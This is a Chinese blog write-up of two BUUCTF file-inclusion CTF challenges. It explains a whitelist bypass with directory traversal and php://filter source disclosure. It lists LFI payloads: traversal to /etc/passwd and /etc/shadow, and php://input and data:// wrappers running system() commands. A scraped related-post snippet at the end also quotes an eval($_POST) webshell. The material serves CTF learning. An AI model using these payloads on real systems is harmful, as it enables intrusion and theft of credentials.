BUUCTF两道目录包含题目

原创 于 2025-06-11 18:48:32 发布 · 752 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #mysql #安全

目录包含

文章目录

[HCTF 2018]WarmUp1

本题考查代码审计,具体考查白名单过滤不严格、文件包含include()实现目录遍历

#知识点
1、文件包含函数
    include() 、include_once() 
    require() 、require_once() 
    include文件不存在时抛出警告,然后继续执行;require则抛出致命错误,终止执行。

2、读取敏感文件
    读取配置文件:/etc/passwd(Linux 用户信息)、/etc/shadow(密码哈希)、/etc/hosts、php.ini。
    读取会话文件:/var/lib/php/sess_<session_id>(获取用户会话)。
    读取日志文件:/var/log/apache2/access.log(结合日志注入攻击)。
    读取代码文件:如网站源代码(index.php、config.php等)

// 漏洞
include($_GET['page']);

// Payload
?page=/etc/passwd
?page=../../../../etc/passwd  # 目录遍历

// 绕过技巧:
使用多个../向上跳转目录。
URL 编码绕过:%2e%2e%2f(../的编码)。

#利用 PHP 伪协议
3、php://input:读取 POST 原始数据(条件:allow_url_include=On)
// 攻击请求
?page=php://input
<?php system('cat /etc/passwd'); ?>

4、php://filter:读取文件源码(用于代码审计)
// 读取源码并Base64编码
?page=php://filter/convert.base64-encode/resource=[文件名]

5、data://text/plain:注入 PHP 代码(条件:allow_url_include=On)
?page=data://text/plain,<?php system('id'); ?>

6、zip:///phar
//:利用压缩文件包含恶意代码
......

题目名称无有效信息,打开是一个图片,查看源代码

image-20250519215610067

image-20250519215641140

注释信息中有一个source.php,给出了代码,白名单数组中还定义了一个hint.php

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

代码中class emmm定义过滤函数checkFile(& p a g e ) ,首先使用仅包含 ‘ s o u r c e . p h p ‘ 、 ‘ h i n t . p h p ‘ 关键字的白名单数组,对传入的 ‘ page),首先使用仅包含`source.php`、`hint.php`关键字的白名单数组,对传入的` page),首先使用仅包含source.phphint.php关键字的白名单数组,对传入的page参数进行一次截取第一个?前字符串进行过滤的操作,如果传入的参数在 w h i t e l i s t ‘ 中,则放行,若不是,则不予通过;然后进行一次 ‘ whitelist`中,则放行,若不是,则不予通过;然后进行 一次` whitelist中,则放行,若不是,则不予通过;然后进行一次_page = urldecode($page)`URL解码;然后再对编码后的参数进行一次截取过滤。

image-20250519232009567

通过checkFile()检查后,代码引用了危险函数include()进行文件包含,存在文件包含漏洞

如何绕过?

这里只要确保传入的参数?前是source.php或者hint.php就行

另外,hint.php提示flag在ffffllllaaaagggg

image-20250519220006815

构造payload

http://ad2dbcdc-0269-47c1-b009-4979e8d2c9aa.node5.buuoj.cn:81/?file=source.php?../ffffllllaaaagggg

image-20250519233901106

不在此层,向上遍历目录(网上有师傅说可以直接遍历n个…/,可以直接遍历到最顶层)获得flag

http://ad2dbcdc-0269-47c1-b009-4979e8d2c9aa.node5.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg

image-20250519234000990

[ACTF2020 新生赛]Include1

本题考查php伪协议实现任意文件读取

#知识点
php:// 协议
1、php://filter用于读取源码
php://filter/[filter_name]/resource=[file_path]
2、php://input用于执行php代码

#实例
1、php://filter/read=convert.base64-encode/resource=[文件名]
读取文件源码(输出经过base64编码后的源代码)
2、php://input + [POST DATA]执行php代码
http://xx.xx.xx.xx?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
<?php system("ls"); ?>

#参考
https://blog.51cto.com/u_15414689/5530906
https://segmentfault.com/a/1190000018991087#comment-area

image-20250519215142360

image-20250519215118082

打开题目,查看源代码、扫描目录均无有效信息。

根据题目名称以及页面链接提示,可知这题考查include()函数,该函数支持伪协议

#支持伪协议的函数还有
1、文件包含函数
include();
include_once();
require();
require_once();
2、文件操作类函数
fopen();
file();
readfile();
file_get_contents();

尝试用php://协议读取flag.php

#构造payload
http://297bdcde-82ca-4256-8196-cdcf3b805bbb.node5.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

image-20250519215046716

base64解码

image-20250519215017435

[解题之外]

除了php://filter,突发奇想试了下php://inputdata:// 协议,看看结果。

image-20250521205439742

应该是被过滤了关键字

尝试读取index.php

image-20250521213740509

转码发现果然过滤了部分伪协议关键字

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

发现后台代码:

  1. 仅过滤了部分伪协议
  2. 采用字符串匹配的方式不够严谨,可以尝试编码绕过
  3. 没有处理文件路径,可能目录遍历

image-20250521215520416

贵在尝试。

BUUCTF学习(四): 文件包含tips
初尘屿风的博客
10-16 675
-
buuctf的杂项题目
ndjnddjxn的博客
04-26 576
文件尾:AE426082 ,后面还有许多的内容,包含着4number.txt 和 zip。查看图片的高度为256,十六进制为0100,查找后修改为0300(十六进制)是一个音频隐写的题目,用Audacity打开,将图片用Stgeslove 打开,然后另存为一张图片,是明显的base64编码,直接解密,可以看到应该是张二维码。先用010检查一下,发现文件头和文件尾完整,19 00 00 00:压缩后尺寸(25)17 00 00 00:未压缩尺寸(23)png文件的文件头:89504E47。
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 7520
BUUCTF--Web篇详细wp。
buuctf-Secret File(涉及文件包含)
m0_62094846的博客
10-27 253
打开网页后出现这样的页面,没有可以点击的地方,也没出现什么有用的信息,查看源代码 也没看到什么有用的信息,但出现了一个可以点击的代码,点击一下,进入这样的界面 又出现一个按钮,点击后却说查阅结束,要我们回去看看 查看后有个有意思的发现 源页面中的代码是action.php 但是点开后的页面却是end.php 所以可以判断两个页面之间还有一个页面,但是无论怎么输入action.php,页面都会跳转到end.php,可能是页面转的太快,试试抓包让它停下来 抓包...
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 725
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File
weixin_42566218的博客
02-21 1315
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File 题目链接:BUUCTF 类型:文件包含 知识点: 302隐式重定向、php伪协议(php://filter) 解题过程 直接看页面没啥信息,F12打开控制台发现一个超链接,因为设置了style样式和背景颜色一样所以看不出来,其实可以在页面中用ctrl+a找到这个超链接标签 跟随超链接进入到Archive_room.php页面,这里有一个SECRET链接标签,用控制台看是链接到action.php页面的 但是点
BUUCTF WEB Include(文件包含
guishengyx的博客
10-18 2083
查看源码,什么都没有 点击tips 题目名称也提示了,是文件包含漏洞 百度了解到php://filter伪协议 ?file=php://filter/read=convert.base64-encode/resource=flag.php
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 302
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
Buuctf_Include【文件包含——伪类】
qq_61968245的博客
12-17 726
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 0x02
buuctf Include 1(文件包含)
m0_63883187的博客
01-10 359
超级简单的文件包含题目文件包含启蒙系列
BUUCTF 命令执行/文件包含类型部分wp
XINO
11-24 7725
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
BUUCTF web 文件上传+文件包含
m0_55854679的博客
08-09 3194
文章目录[ACTF2020 新生赛]Include——文件包含 [ACTF2020 新生赛]Include——文件包含 1.打开题目链接,查看题目意思为文件包含 2. 获取到的url为 http://c605348f-44f9-4c25-b602-66c73ee07005.node3.buuoj.cn/?file=flag.php 是一个php文件,返回字符串如下:Can you find out the flag? 猜测读取原码:构造url: ?file=php://filter/read=conve
buuctf-Include
xixihahawuwu的博客
11-23 1386
打开题目环境,就看到一个tips 点击 先回之前界面看看源码 线索这不就来了吗 … 这就是粗心的下场…浪费时间了 看下源码 源码啥都没有 突然觉得这题好熟悉的说 上题不也是给出了flag.php但是直接连接却没有内容吗,想着会不会又是php伪协议 毕竟这两道题是连在一起的(咳咳,不太明白的可以去看我的上一个博客,我可没有要你们给我增加浏览量的意思哈) 按照上题的格式试一下 ?file=php://filter/read=convert.base64-encode/resource=flag.p.
文件包含(借助CTFHUB,buuctf
ndjnddjxn的博客
04-24 1105
定义:使用文件包含函数将文件包起来,直接使用包含文件的代码为了灵活包含文件,将包含的文件设置为变量,通过动态变量来引入需要包含的文件时,用户可对变量值可控而服务器没有对变量值进行合理的校验或者校验被绕过导致的,通常为php语言。00截断属于RCE绕过,遇到00自动停止长度截断包含日志文件包含session二、include 表达式。
buuctf-Had a bad day(文件包含
m0_62094846的博客
11-21 931
两个按钮随便点一个 看样子有点像文件包含 ?category=php://filter/read=convert.base64-encode/resource=woofers base64解密后得到代码 但这只是说明了图片大小,没有用 应该用这个 ?category=php://filter/read=convert.base64-encode/resource=index 不能加.php,会报错 解密可以得到html代码 <html> <hea...
BUUCTF【Web】Include(文件包含伪协议)
qq_70434663的博客
03-01 771
进入靶场后习惯的右键查看源码但什么都没有发现,点击“tips”后得到“can you find out the flag?”内容源码也没有什么内容。其实题目已经提示了“include”文件包含漏洞(伪协议)。最后在进行base64解码就可以得到flag了。对于文件包含漏洞大家可以看。
buuctf-[BSidesCF 2020]Had a bad day 文件包含
2202_75317918的博客
10-04 451
文件包含,使用php伪协议读取一下,但是发现报错,而且有两个.php,可能是自己会加上php后缀。其中一个才能包含传入以传入名为文件名的文件,要想办法包含flag.php。但是文件里面必须要有index,woofers,看到一串base64,解码。之中的一个改payload。就两个按钮,随便按按。
BUUCTF-NIZHUANSIWEI(文件包含,伪协议,反序列化)
Y_KolaFish_Y的博客
07-27 457
BUUCTF-NIZHUANSIWEI(文件包含,伪协议,反序列化) 一、代码审计 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_c
buuctf题目维护
最新发布
12-28
### 关于BUUCTF题目的维护方法与资源 对于BUUCTF这类平台上的题目,其维护主要涉及几个方面:更新现有挑战、修复漏洞以及提供详尽的学习资料和支持。为了确保这些目标得以实现,通常会采取一系列措施。 #### 更新现有挑战 定期对已有的题目进行审查和改进是非常重要的。这不仅有助于保持平台的新鲜感,还能防止某些过时的技术被滥用。通过引入新的攻击向量和技术趋势,可以使参与者接触到最新的安全威胁形式[^1]。 #### 修复漏洞 当发现任何可能影响用户体验或安全性的问题时,应立即着手解决这些问题。例如,在提到的`.git`泄露案例中,及时修补此类错误至关重要,因为它们可能会暴露敏感信息并损害系统的完整性[^3]。 #### 提供学习材料和支持 创建详细的文档和指南可以帮助新手更好地理解如何参与CTF竞赛及其背后的概念。此外,建立活跃的社区论坛也是不可或缺的一部分;在这里成员们能够互相帮助解决问题,并分享宝贵的经验教训。高质量的安全攻防与CTF社区提供了丰富的资源库,包括但不限于各类工具介绍、技术文章等,这些都是非常有价值的参考资料[^2]。 ```python # Python脚本用于自动化检测网站是否存在.git目录泄漏问题 import requests def check_git_leak(url): try: response = requests.get(f"{url}/.git/") if "index.html" not in str(response.content) and response.status_code == 200: print("[!] Potential .git leak detected!") else: print("[+] No obvious signs of a .git leak.") except Exception as e: print(f"[x] Error occurred: {str(e)}") check_git_leak("http://example.com") # 替换为目标站点URL ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值